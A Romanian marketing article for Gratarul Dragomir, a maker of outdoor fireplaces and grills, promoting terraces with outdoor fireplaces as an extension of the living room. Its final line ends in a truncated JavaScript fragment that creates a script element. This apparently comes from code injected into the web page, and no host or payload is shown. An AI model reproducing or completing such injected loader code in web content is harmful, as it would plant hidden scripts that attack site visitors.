seminee exterior

seminee exterior

In conceptele moderne de case delimitarile devin din ce in ce mai putin prezente, iar conceptul de Open-Space devine tot mai popular. Asa ca, de ce nu am transforma curtea intr-o extensie a livingului? Ei bine, se poate, producatorul de sobe, gratare si seminee exterior Gratarul Dragomir va ofera cele mai elegante, clasice sau moderne modele pentru orice tip de casa, curte sau spatiu de relaxare. Totul pentru ca dumneavoastra sa va puteti petrece cele mai frumoase clipe intr-un décor select si primitor.

Include terasa in spatiul de living si doteaz-o cu un semineu exterior

Spuneam despre conceptul Open-Space ca prinde tot mai mult teren si in Romania, lucru care nu poate decat sa ne bucure deoarece conceptul din spatele acestui stil de amenajari interioare si exterioare este unul care insufla libertate. Includerea unei parti din gradina in spatiul dedicat livingului poate fi definita ca o miscare indrazneata, mai ales in conditiile de clima caracteristice tarii noastre. Insa, daca apelati la o serie de solutii simple dar ingenioase, veti putea instala orice tip de seminee exterior pentru a va putea amenaja un superb spatiu de relaxare, potrivit chiar si pe timp de iarna, bineinteles, cu conditia de a va imbraca totusi mai gros.
Cea mai mare problema in includerea unei portiuni din gradina si transformarea acesteia intr-o terasa in continuarea livingului este izolarea termica, dar si amenajarea spatiului pentru a fi protejat de precipitatii. Daca pentru a oferi caldura zonei de relaxare puteti folosi seminee exterior, pentru a proteja intreaga zona puteti folosi un sistem de copertine retractabile sau a unei structuri de acoperire ce poate fi inlaturata pe vreme frumoasa.
Un spatiu deschis, comun cu terasa implica si necesitatea unor usi speciale, care sa permita unirea celor doua spatii pe timp de vara, si izolarea acestora atunci cand afara este frig. Usile glisante termopan pot fi o alegere foarte buna, insa pentru cei ce doresc un grad de comfort termic mult mai bun, pot alege separarea celor zone prin intermediul unui perete mobil. Acesta pate fi echipat si cu o usa de acces mai mica ce permite totusi si accesul pe terasa pentru a putea savura un vin fiert cu cei dragi in fata semineului.

Terasele cu seminee exterior punctul de atractie al casei dumneavoastra

La terasele prevazute cu seminee exterior intregul concept de amenajare este axat in jurul semineelor, prin pozitionarea unor fotolii sau a zonelor de relaxare in jurul acestora. Odata amplasat semineul, puteti deveni complet creativi prin folosirea de elemente naturale de décor, dar si corpuri de iluminat LED pentru a da viata spatiului.
Pe timpul verii terasele cu seminee exterior pot fi punctul de atractie, mai ales in serile placute de vara. Asadar, ofera-le celor dragi toata libertatea si profita de spatiul natural din jurul casei. Expertii firmei Gratarul Dragomir va pot oferi servicii complete de realizare design (cu vizualizare 3D a schitei) constructie dar si intretinere pentru seminee exterior, gratare, bucatarii de exterior si multe altele. Toate pentru curtea sau casa dumneavoastra. Va asteptam pe siteul www.grataruldragomir.ro pentru a vizualiza modele variate sau petnru a solicita o oferta. Te asteptam!var d=document;var s=d.createElement(‘script’);